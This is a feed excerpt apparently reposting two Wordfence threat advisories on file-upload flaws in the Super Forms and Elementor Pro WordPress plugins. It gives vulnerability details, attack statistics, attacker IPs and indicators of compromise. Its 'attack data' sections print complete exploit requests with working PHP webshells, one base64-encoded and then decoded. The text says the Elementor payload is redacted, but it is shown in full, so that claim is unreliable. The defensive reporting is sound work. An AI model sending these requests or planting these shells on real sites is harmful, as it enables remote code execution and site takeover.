		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 03 Sep 2026 19:39:46 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/attackers-actively-exploiting-critical-vulnerability-in-super-forms-plugin/</guid>

					<description><![CDATA[On July 9th, 2026, we publicly disclosed a critical Unauthenticated Arbitrary File Upload vulnerability in Super Forms, a WordPress plugin with an estimated 13,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to upload arbitrary files, including PHP backdoors, and achieve remote code execution. The vendor released the fully patched version on July [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On July 9th, 2026, we publicly disclosed a critical Unauthenticated Arbitrary File Upload vulnerability in <a href="https://super-forms.com/" target="_blank" rel="noopener">Super Forms</a>, a WordPress plugin with an estimated 13,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to upload arbitrary files, including PHP backdoors, and achieve remote code execution. The vendor released the fully patched version on July 8th, 2026, and we disclosed this vulnerability in the Wordfence Intelligence vulnerability database on July 9th, 2026. Our records indicate that attackers started exploiting the issue on July 14th, 2026, the same day we released the firewall rule. <strong>The Wordfence Firewall has already blocked over 250,000 exploit attempts targeting this vulnerability</strong>.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in Super Forms on July 14, 2026. Sites using the free version of Wordfence received the same protection 30 days later on August 13, 2026.</p>
<p>Considering this vulnerability is being actively exploited, we urge users to ensure their sites are updated with the latest patched version of Super Forms, version 6.3.314 at the time of this writing, as soon as possible.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c7fb16-efbb-41e9-be13-98e96c1e9100" target="_blank" rel="noopener">Super Forms &lt;= 6.3.313 &#8211; Unauthenticated Arbitrary File Upload via &#8216;data&#8217; Parameter (datauristring / value)</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14894" target="_blank" rel="noopener noreferrer">							CVE-2026-14894						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 6.3.313</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">6.3.314</strong>
				</div>
<div class="bounty">
					<span>Bounty</span><br />
					<strong>$33.00</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-forms" target="_blank" rel="noopener">Super Forms – Drag &amp; Drop Form Builder</a> <span class="wfvr-software-slug">[super-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8dae08eb7d527264fd4e9c97ea820971.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8dae08eb7d527264fd4e9c97ea820971"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-bocchetti" target="_blank" rel="noopener">andrea bocchetti</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The Super Forms – Drag &amp; Drop Form Builder plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 6.3.313 via the submit_form function. This is due to missing file type validation and the absence of any capability check on the submit_form nopriv AJAX handler, whose only barrier is a session nonce freely obtainable by unauthenticated visitors via a separate nopriv endpoint. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible. The nonce requirement is trivially bypassed because the super_create_nonce nopriv AJAX action allows any unauthenticated visitor to mint a valid sf_nonce and session cookie in a single prior request, reducing exploitation to two unauthenticated HTTP requests.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c7fb16-efbb-41e9-be13-98e96c1e9100" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Vulnerability Details</h2>
<p>Super Forms is a drag-and-drop form builder plugin for WordPress that supports file upload fields. Form submissions, including uploaded files, are handled by the <code>submit_form()</code> function in the <code>SUPER_Ajax</code> class, which is reachable by unauthenticated visitors.</p>
<p>Examining the code reveals that, when processing a field of type files that contains a <code>datauristring</code> value, the plugin base64-decodes the attacker-supplied content and writes it to disk. The destination filename is taken from an attacker-controlled value and concatenated directly onto the upload directory path before the file is written:</p>
<pre class="brush: php; first-line: 2747; title: ; notranslate">if(isset($value['datauristring'])){
    try {
        $imgData = str_replace( ' ', '+', $value['datauristring']);
        unset($value['datauristring']);
        $imgData =  substr( $imgData, strpos( $imgData, "," )+1 );
        $imgData = base64_decode( $imgData );
        unset($GLOBALS['super_upload_dir']);
        add_filter( 'upload_dir', array( 'SUPER_Forms', 'filter_upload_dir' ));
        if(empty($GLOBALS['super_upload_dir'])){
            // upload directory is altered by filter: SUPER_Forms::filter_upload_dir()
            $GLOBALS['super_upload_dir'] = wp_upload_dir();
        }
        $d = $GLOBALS['super_upload_dir'];
        $value['value'] = SUPER_Common::email_tags( $value['value'], $data, $settings );
        $value['label'] = SUPER_Common::email_tags( $value['label'], $data, $settings );
        $basename = $value['value'];
        $filename = trailingslashit($d['path']) . $basename;
        $file = fopen($filename, 'w');
        fwrite($file, $imgData);
        fclose($file);</pre>
<p>The plugin does not validate the file type or extension. As a result, an unauthenticated attacker can supply a filename with a <code>.php</code> extension, and optionally path traversal sequences, causing the decoded bytes to be written as an executable PHP file to a location of the attacker’s choosing on the server.</p>
<p>This makes it possible for unauthenticated attackers to write a PHP webshell to the site and execute arbitrary code, which can be leveraged to create administrator accounts, exfiltrate data, or take complete control of the site.</p>
<h2>A Closer Look at the Attack Data</h2>
<p>The following data highlights actual exploit attempts from threat actors targeting this vulnerability. The attacker submits a crafted payload to the <code>super_submit_form</code> endpoint containing a file field with a base64-encoded PHP payload and an attacker-controlled filename.</p>
<h3>Example attack request</h3>
<pre class="brush: plain; title: ; notranslate">
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [redacted]
X-Real-Ip: 103.168.146.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded

action=super_submit_form&amp;form_id=2&amp;sf_nonce=04c3aa2046&amp;data={"sf_upload_field": {"type": "files", "files": [{"datauristring": "data:image/gif;base64,PD9waHAgaWYoaXNzZXQoJF9GSUxFU1siZmlsZSJdKSl7JHRhcmdldD1iYXNlbmFtZSgkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7aWYobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZpbGUiXVsidG1wX25hbWUiXSwkdGFyZ2V0KSl7ZWNobyLinIUgVXBsb2FkZWQ6IDxhIGhyZWY9JyR0YXJnZXQnPiR0YXJnZXQ8L2E+Ijt9ZWxzZXtlY2hvIuKdjCBVcGxvYWQgZmFpbGVkISI7fWV4aXQ7fT8+PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PHRpdGxlPk11c2hyMDB3IFVwbG9hZGVyPC90aXRsZT48L2hlYWQ+PGJvZHkgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZTtkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1pdGVtczpjZW50ZXI7aGVpZ2h0OjEwMHZoO21hcmdpbjowOyI+PGZvcm0gbWV0aG9kPSJQT1NUIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBzdHlsZT0iYmFja2dyb3VuZDojMTExO3BhZGRpbmc6NDBweDtib3JkZXI6MnB4IHNvbGlkICMwMGZmMDA7Ym9yZGVyLXJhZGl1czoxMHB4O3RleHQtYWxpZ246Y2VudGVyOyI+PGgyPvCfk6QgVVBMT0FEPC9oMj48aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgcmVxdWlyZWQgc3R5bGU9ImJhY2tncm91bmQ6IzBhMGEwYTtjb2xvcjojMDBmZjAwO2JvcmRlcjoxcHggc29saWQgIzAwZmYwMDtwYWRkaW5nOjEwcHg7Ym9yZGVyLXJhZGl1czo1cHg7Ij48YnI+PGJyPjxidXR0b24gdHlwZT0ic3VibWl0IiBzdHlsZT0iYmFja2dyb3VuZDojMDBmZjAwO2NvbG9yOiMwYTBhMGE7cGFkZGluZzoxMHB4IDMwcHg7Ym9yZGVyOm5vbmU7Ym9yZGVyLXJhZGl1czo1cHg7Zm9udC13ZWlnaHQ6Ym9sZDtjdXJzb3I6cG9pbnRlcjsiPuKshiBVcGxvYWQ8L2J1dHRvbj48L2Zvcm0+PC9ib2R5PjwvaHRtbD4=", "value": "Mushr00w_upl.php", "name": "Mushr00w_upl.php", "label": "attachment"}]}}
</pre>
<p>In the request above, the attacker submits a file field whose <code>datauristring</code> carries a base64-encoded payload prefixed with a <code>data:image/gif;base64</code> content type. The declared image content type is not verified against the actual contents, which are a PHP file-uploader webshell, and the value and name fields set the destination filename to <code>Mushr00w_upl.php</code>. Because the vulnerable version of Super Forms does not validate the file type or sanitize the filename before writing the file, the decoded payload is written to the filesystem as an executable PHP file. The attacker can then request the file directly to run the webshell, which provides a browser-based interface for uploading further malicious files to the site.</p>
<p>The contents of the decoded Mushr00w_upl.php will be a compact, AI-generated uploader:</p>
<pre class="brush: php; title: ; notranslate">&lt;?php if(isset($_FILES["file"])){$target=basename($_FILES["file"]["name"]);if(move_uploaded_file($_FILES["file"]["tmp_name"],$target)){echo"&#x2705; Uploaded: &lt;a href='$target'&gt;$target&lt;/a&gt;";}else{echo"&#x274c; Upload failed!";}exit;}?&gt;&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;Mushr00w Uploader&lt;/title&gt;&lt;/head&gt;&lt;body style="background:#0a0a0a;color:#00ff00;font-family:monospace;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;"&gt;&lt;form method="POST" enctype="multipart/form-data" style="background:#111;padding:40px;border:2px solid #00ff00;border-radius:10px;text-align:center;"&gt;&lt;h2&gt;&#x1f4e4; UPLOAD&lt;/h2&gt;&lt;input type="file" name="file" required style="background:#0a0a0a;color:#00ff00;border:1px solid #00ff00;padding:10px;border-radius:5px;"&gt;&lt;br&gt;&lt;br&gt;&lt;button type="submit" style="background:#00ff00;color:#0a0a0a;padding:10px 30px;border:none;border-radius:5px;font-weight:bold;cursor:pointer;"&gt;&#x2b06; Upload&lt;/button&gt;&lt;/form&gt;&lt;/body&gt;&lt;/html&gt;</pre>
<p>This first stage dropper is utilized to upload further malware to the site. It has the Mushr00w branding used by a hacker group that recently defaced the website of Malaysia’s Health Ministry through a Joomla content editor extension vulnerability (<a href="https://www.cve.org/CVERecord?id=CVE-2026-48907" target="_blank" rel="noopener">CVE-2026-48907</a>). This does not necessarily mean the group is involved in the creation of this uploader as hacker attributions can be swapped out easily.</p>
<p>Once such an uploader is successfully placed on a website, it can be used to upload further shells, spam files, phishing kits and other malicious code.</p>
<h2>Wordfence Firewall</h2>
<p>The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/super-forms-file-upload-howto-wordfence-firewall.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/super-forms-file-upload-howto-wordfence-firewall.png" alt="super forms file upload howto wordfence firewall" width="980" height="819" class="alignnone size-full wp-image-42973"></a></p>
<h2>Total Number of Exploits Blocked</h2>
<p>The Wordfence Firewall has <strong>blocked over 250,000 exploit attempts</strong> targeting this vulnerability.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-WAF-929-1.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-WAF-929-1.png" alt="Blocked attacks WAF 929 1" width="1024" height="768" class="alignnone size-full wp-image-43002"></a></p>
<p>According to our data, attackers started targeting websites within days of the vulnerability being disclosed, on July 14th, 2026. We also detected and blocked a large number of exploit attempts from August 18th to 25th.</p>
<h2>Top Offending IP Addresses</h2>
<p>The following IP Addresses are currently the most actively engaged IP addresses targeting the Super Forms plugin:</p>
<ul>
<li>103.168.147.235
<ul>
<li>Over <strong>106,000</strong> blocked requests.</li>
</ul>
</li>
<li>103.168.146.131
<ul>
<li>Over <strong>82,000</strong> blocked requests.</li>
</ul>
</li>
<li>103.154.152.178
<ul>
<li>Over <strong>5,000</strong> blocked requests.</li>
</ul>
</li>
<li>103.170.97.7
<ul>
<li>Over <strong>3,400</strong> blocked requests.</li>
</ul>
</li>
<li>182.10.130.51
<ul>
<li>Over <strong>3,000</strong> blocked requests.</li>
</ul>
</li>
<li>189.4.122.140
<ul>
<li>Over <strong>2,700</strong> blocked requests.</li>
</ul>
</li>
<li>129.227.46.143
<ul>
<li>Over <strong>2,100</strong> blocked requests.</li>
</ul>
</li>
<li>64.176.209.104
<ul>
<li>Over <strong>1,900</strong> blocked requests.</li>
</ul>
</li>
<li>103.164.182.122
<ul>
<li>Over <strong>1,700</strong> blocked requests.</li>
</ul>
</li>
<li>37.9.33.62
<ul>
<li>Over <strong>1,700</strong> blocked requests.</li>
</ul>
</li>
</ul>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-by-IP-WAF-929.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-by-IP-WAF-929.png" alt="Blocked attacks by IP WAF 929" width="1024" height="768" class="alignnone size-full wp-image-42974"></a></p>
<h2>Indicators of Compromise</h2>
<p>Because a successful attack results in an executable file being written to the server, and the path traversal allows the file to be placed in any location the web server can write to, or an existing file to be overwritten, it is recommended to review your entire site for any unexpected or recently modified .php files, as well as any files with unusual names created or changed on or after July 8th, 2026. In the attacks we have observed, the uploaded webshell was commonly named <code>Mushr00w_upl.php</code>, so the presence of a file with this name is a strong indicator of compromise, though attackers may use other filenames and locations as well.</p>
<p>We also recommend reviewing your web server access logs for requests to /wp-admin/admin-ajax.php with the action parameter set to <code>super_submit_form</code>, especially those originating from the following IP addresses:</p>
<ul>
<li>103.168.147.235</li>
<li>103.168.146.131</li>
<li>103.154.152.178</li>
<li>103.170.97.7</li>
<li>182.10.130.51</li>
<li>189.4.122.140</li>
<li>129.227.46.143</li>
<li>64.176.209.104</li>
<li>103.164.182.122</li>
<li>37.9.33.62</li>
</ul>
<p>If you find evidence of compromise, we recommend removing any unknown administrator accounts and unexpected files, and reviewing the site for backdoors. The absence of any such log entries does not guarantee that your website has not been compromised.</p>
<h2>Conclusion</h2>
<p>In today’s article, we covered the attack data for a critical-severity Unauthenticated Arbitrary File Upload vulnerability in the <a href="https://super-forms.com/" target="_blank" rel="noopener">Super Forms plugin</a> that allows unauthenticated threat actors to upload executable PHP files and achieve remote code execution, leading to complete site compromise. Our threat intelligence indicates that attackers have been targeting this vulnerability at scale, with the heaviest exploitation occurring between August 18th and August 25th, 2026. The Wordfence firewall has already blocked over 250,000 exploit attempts targeting this vulnerability.</p>
<p><a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> users received a firewall rule to protect against known exploits targeting this vulnerability in Super Forms on July 14, 2026. Sites using the free version of Wordfence received the same protection 30 days later on August 13, 2026.</p>
<p>Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to at least version 6.3.314 in order to maintain normal functionality. If you have friends or colleagues using <a href="https://super-forms.com/" target="_blank" rel="noopener">Super Forms</a>, be sure to forward this advisory to them, as sites could still be unprotected and unpatched.</p>
<p>If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>. If you need your site cleaned immediately, <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a> offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.</p>
<p>The post <a href="https://www.wordfence.com/blog/2026/09/attackers-actively-exploiting-critical-vulnerability-in-super-forms-plugin/" target="_blank" rel="noopener">Attackers Actively Exploiting Critical Vulnerability in Super Forms Plugin</a> appeared first on <a href="https://www.wordfence.com/" target="_blank" rel="noopener">Wordfence</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Attackers Actively Exploiting Critical Vulnerability in Elementor Pro Plugin</title>
		<link>https://swiftupdates.ca/attackers-actively-exploiting-critical-vulnerability-in-elementor-pro-plugin/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Wed, 02 Sep 2026 15:39:48 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/attackers-actively-exploiting-critical-vulnerability-in-elementor-pro-plugin/</guid>

					<description><![CDATA[On August 19th, 2026, we publicly disclosed a critical Unauthenticated Arbitrary File Upload vulnerability in Elementor Pro, a WordPress plugin with more than 6,000,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to upload arbitrary files, including executable PHP files, to a vulnerable site, which can lead to remote code execution and complete [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>On August 19th, 2026, we publicly disclosed a critical Unauthenticated Arbitrary File Upload vulnerability in <a href="https://elementor.com/pro/" target="_blank" rel="noopener">Elementor Pro</a>, a WordPress plugin with more than 6,000,000 active installations. This vulnerability can be leveraged by unauthenticated attackers to upload arbitrary files, including executable PHP files, to a vulnerable site, which can lead to remote code execution and complete site takeover. The vendor released the fully patched version on August 19th, 2026, and we originally disclosed this vulnerability in the Wordfence Intelligence vulnerability database on the same day. <strong>The Wordfence Firewall has already blocked over 190,000 exploit attempts targeting this vulnerability</strong>.</p>
<p>All Wordfence users, including those running <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Wordfence Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Wordfence Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Wordfence Response</a>, as well as sites running the free version of Wordfence, are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Malicious File Upload protection.</p>
<p>Considering this vulnerability is being actively exploited, we urge users to ensure their sites are updated with the latest patched version of Elementor Pro, version 4.2.2 at the time of this writing, as soon as possible.</p>
<h2>Vulnerability Summary from Wordfence Intelligence</h2>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a32b02f-db40-42fe-b46c-4a5f2bc9ba09" target="_blank" rel="noopener">Elementor Pro &lt;= 4.2.1 &#8211; Unauthenticated Arbitrary File Upload via Upload Field Array Validation Bypass</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32475" target="_blank" rel="noopener noreferrer">							CVE-2026-32475						</a>					</strong>
				</div>
<div class="affected-versions">
					<span>Affected Version(s)</span><br />
											<strong>&lt;= 4.2.1</strong>
									</div>
<div class="patched-status">
					<span>Patched Version</span><br />
					<strong class="patched">4.2.2</strong>
				</div>
<div class="bounty">
					<span>Bounty</span><br />
					<strong>$15,600.00</strong>
				</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elementor-pro" target="_blank" rel="noopener">Elementor Website Builder Pro</a> <span class="wfvr-software-slug">[elementor-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8ec93bb7e5ec96ab4636699e413382c9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8ec93bb7e5ec96ab4636699e413382c9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tin-pham-2" target="_blank" rel="noopener">Tin Pham (TF1T)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4ecc8b71d0984f421844d12e862a7638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4ecc8b71d0984f421844d12e862a7638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/austin-ginder" target="_blank" rel="noopener">Austin Ginder</a></div>
</p></div>
</p></div>
</p></div>
<div class="vulnerability-description">
			The Elementor Pro plugin for WordPress is vulnerable to Unrestricted File Type Upload in all versions up to, and including, 4.2.1 via the process_field function. This is due to a validation loop in Upload::validation() using &#8216;return&#8217; instead of &#8216;continue&#8217; when the first array element has UPLOAD_ERR_NO_FILE, aborting all extension and file type checks for remaining files in the same upload field. This makes it possible for unauthenticated attackers to upload files that may be executable, which makes remote code execution possible. This requires that the targeted site has published a page containing an Elementor Pro Form widget with at least one non-required File Upload field.		</div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0a32b02f-db40-42fe-b46c-4a5f2bc9ba09" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<h2>Vulnerability Details</h2>
<p>The vulnerability exists due to the way the Elementor Pro Form widget handles File Upload fields. When a File Upload field is not marked as required, a flaw in the field’s validation routine causes the extension and file type checks to be skipped for the uploaded file, allowing an unauthenticated attacker to upload a file with an arbitrary extension, such as .php, and achieve remote code execution. Exploitation requires the targeted site to have published a page containing an Elementor Pro Form widget with at least one non-required File Upload field.</p>
<p>We covered the full technical details of this vulnerability in a dedicated blog post, which we recommend reading for a complete analysis:</p>
<p><a href="https://www.wordfence.com/blog/2026/08/critical-arbitrary-file-upload-vulnerability-patched-in-elementor-pro-wordpress-plugin/" target="_blank" rel="noopener">Critical Arbitrary File Upload Vulnerability Patched in Elementor Pro WordPress Plugin</a></p>
<p>As with all arbitrary file upload vulnerabilities, this can lead to complete site compromise through the use of webshells and other techniques.</p>
<h2>A Closer Look at the Attack Data</h2>
<p>The following data highlights an actual exploit attempt from threat actors targeting this vulnerability. The attacker submits the form’s File Upload field as an array, where the first element is empty and the second element carries a PHP payload with a .php filename, which is the structure that triggers the validation bypass.</p>
<h3>Example attack request</h3>
<pre class="brush: plain; title: ; notranslate">
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=b6761add721875da77ab27c1c43430ba

--b6761add721875da77ab27c1c43430ba
Content-Disposition: form-data; name="action"

elementor_pro_forms_send_form
--b6761add721875da77ab27c1c43430ba
Content-Disposition: form-data; name="post_id"

2821
--b6761add721875da77ab27c1c43430ba
Content-Disposition: form-data; name="form_id"

10f53b4
--b6761add721875da77ab27c1c43430ba
Content-Disposition: form-data; name="form_fields[name]"

test
--b6761add721875da77ab27c1c43430ba
Content-Disposition: form-data; name="form_fields[email]"

[redacted]
--b6761add721875da77ab27c1c43430ba
Content-Disposition: form-data; name="form_fields[message]"

test
--b6761add721875da77ab27c1c43430ba
Content-Disposition: form-data; name="form_fields['field_cc213f9'][0]"; filename=""
Content-Type: 
Expires: 0


--b6761add721875da77ab27c1c43430ba
Content-Disposition: form-data; name="form_fields['field_cc213f9'][1]"; filename="x1.php"
Content-Type: application/octet-stream
Expires: 0

&lt;?php $c=$_GET["c"];if(function_exists("system")){system($c);}elseif(function_exists("passthru")){passthru($c);}elseif(function_exists("shell_exec")){echo shell_exec($c);}elseif(function_exists("exec")){exec($c,$o);echo implode("n",$o);}elseif(function_exists("proc_open")){$p=proc_open($c,array(1=&gt;array("pipe","w"),2=&gt;array("pipe","w")),$q);if(is_resource($p)){echo stream_get_contents($q[1]).stream_get_contents($q[2]);}}elseif(function_exists("popen")){$h=popen($c,"r");echo stream_get_contents($h);pclose($h);}else{echo "NO_EXEC";}?&gt;
--b6761add721875da77ab27c1c43430ba--
</pre>
<p>In the request above, the File Upload field is submitted as an array. The first element (<code>form_fields['field_cc213f9'][0]</code>) has an empty filename, which sets the <code>UPLOAD_ERR_NO_FILE</code> state that triggers the validation bypass, causing all further validation to be skipped for the remaining elements. The second element (<code>form_fields['field_cc213f9'][1]</code>) then carries the malicious file with a .php extension, which is written to the server. We have redacted the webshell payload to avoid publishing working exploit code.</p>
<p>Once written, the uploaded PHP file is placed in the <code>/wp-content/uploads/elementor/forms/</code> directory under a randomly generated filename with the attacker-supplied <code>.php</code> extension, and the attacker can request it directly to execute arbitrary commands on the server.</p>
<h2>Wordfence Firewall</h2>
<p>The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/08/elementor-pro-file-upload-howto-wordfence-firewall.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/08/elementor-pro-file-upload-howto-wordfence-firewall.png" alt="elementor pro file upload howto wordfence firewall" width="980" height="726" class="alignnone size-full wp-image-42749"></a></p>
<p>The Wordfence firewall’s built-in Malicious File Upload protection detects the attempt to upload an executable file and blocks the request.</p>
<p>The firewall also blocks access to the php file:</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/08/elementor-pro-file-access-howto-wordfence-firewall.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/08/elementor-pro-file-access-howto-wordfence-firewall.png" alt="elementor pro file access howto wordfence firewall" width="980" height="726" class="alignnone size-full wp-image-42750"></a></p>
<p>Please note this protection only works if the “Disable Code Execution for Uploads directory” option is enabled in the Wordfence Global Options page. We strongly recommend all Wordfence users enable this option.</p>
<h2>Total Number of Exploits Blocked</h2>
<p>The Wordfence Firewall has <strong>blocked over 190,000 exploit attempts</strong> since the vulnerability was publicly disclosed.</p>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-WAF-11-Elementor-Pro-1.png" target="_blank" rel="noopener"><img loading="lazy" decoding="async" src="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-WAF-11-Elementor-Pro-1.png" alt="Blocked attacks WAF 11 Elementor Pro 1" width="1024" height="768" class="alignnone size-full wp-image-42980"></a></p>
<p>According to our data, attackers started targeting websites the same day the vulnerability was disclosed, on August 19th, 2026. We also detected and blocked a large number of exploit attempts from August 19th to 23rd.</p>
<h2>Top Offending IP Addresses</h2>
<p>The following IP Addresses are currently the most actively engaged IP addresses targeting the Elementor Pro plugin:</p>
<ul>
<li>2602:fa59:10:7a1::1
<ul>
<li>Over <strong>28,000</strong> blocked requests.</li>
</ul>
</li>
<li>185.196.220.85
<ul>
<li>Over <strong>23,800</strong> blocked requests.</li>
</ul>
</li>
<li>103.84.230.85
<ul>
<li>Over <strong>23,600</strong> blocked requests.</li>
</ul>
</li>
<li>103.90.148.202
<ul>
<li>Over <strong>15,300</strong> blocked requests.</li>
</ul>
</li>
<li>216.126.225.208
<ul>
<li>Over <strong>15,000</strong> blocked requests.</li>
</ul>
</li>
<li>167.254.240.75
<ul>
<li>Over <strong>8,100</strong> blocked requests.</li>
</ul>
</li>
<li>167.254.241.119
<ul>
<li>Over <strong>7,700</strong> blocked requests.</li>
</ul>
</li>
<li>114.10.17.253
<ul>
<li>Over <strong>6,100</strong> blocked requests.</li>
</ul>
</li>
<li>114.10.45.151
<ul>
<li>Over <strong>5,700</strong> blocked requests.</li>
</ul>
</li>
<li>2406:ef80:2:7d19::1
<ul>
<li>Over <strong>4,800</strong> blocked requests.</li>
</ul>
</li>
</ul>
<p><a href="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-by-IP-WAF-11-Elementor-Pro.png" target="_blank" rel="noopener"><img decoding="async" loading="lazy" src="https://www.wordfence.com/wp-content/uploads/2026/09/Blocked-attacks-by-IP-WAF-11-Elementor-Pro.png" alt="Blocked attacks by IP WAF 11 Elementor Pro" width="1024" height="768" class="alignnone size-full wp-image-42969"></a></p>
